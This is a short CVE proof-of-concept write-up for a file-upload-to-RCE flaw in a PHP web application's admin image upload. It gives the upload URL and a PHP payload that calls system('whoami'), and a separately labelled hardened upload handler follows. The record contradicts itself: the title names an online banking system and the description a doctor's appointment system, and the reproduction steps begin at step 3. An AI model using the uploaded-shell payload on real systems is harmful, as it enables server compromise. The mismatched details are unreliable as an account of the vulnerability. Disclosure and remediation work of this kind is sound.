CVE-2022-28568

Title: Online Banking System (File Upload to RCE)

Author: (B3nj1)

Version: 1.0

CVE:

  • Description: Doctor's Appointment System 1.0 is vulnerable to file upload leading to RCE via the image upload in the administrator panel. An attacker can obtain remote command execution just by knowing the path where the uploaded images are stored.

Steps to reproduce:


  • 3- Browsing to that URL executes the uploaded code:

http://localhost/doctors_appointment/assets/img/1651595100_b3nj1.php


Payload

<?php
echo system('whoami');
echo "\nits working!!";
?>
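For contrast, the following is an added example of what a hardened version of the image-upload handler looks like; it is not code from this repository or from the affected project, and the field name ('image'), the storage directory and the request shape are assumptions. It closes the two gaps the PoC relies on: the extension is derived from the sniffed content type rather than the client-supplied filename, and the stored name is random instead of timestamp_originalname.

```php
<?php
// Added example: hypothetical hardened upload handler, not the project's own code.
// Assumptions: the form field is named 'image'; $storeDir is a directory outside
// the web root (placeholder path in the usage line below).

declare(strict_types=1);

const ALLOWED_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];
const MAX_BYTES = 2 * 1024 * 1024;

function save_image_upload(array $file, string $storeDir): string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('not an uploaded file');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Sniff the real content type; never trust the client-supplied name or $_FILES['type'].
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if (!isset(ALLOWED_TYPES[$mime]) || getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('not an accepted image');
    }
    // The extension comes from the sniffed type, so an uploaded "x.php" can never be
    // stored as .php (a GIF/PHP polyglot still ends up as .gif and is served as an image).
    // The name is random, so it cannot be predicted from a timestamp and the original name.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_TYPES[$mime];
    $dest = rtrim($storeDir, '/') . '/' . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    chmod($dest, 0644); // not executable, owner-writable only
    return $name;
}

// Usage in the admin handler (assumed request shape; placeholder directory):
// $saved = save_image_upload($_FILES['image'], '/var/app/uploads');
```

Pair this with a web-server rule that disables script execution in the upload directory (for Apache with mod_php, `php_admin_flag engine off` in that directory's configuration), so that even a misconfiguration elsewhere cannot turn a stored file into executable code.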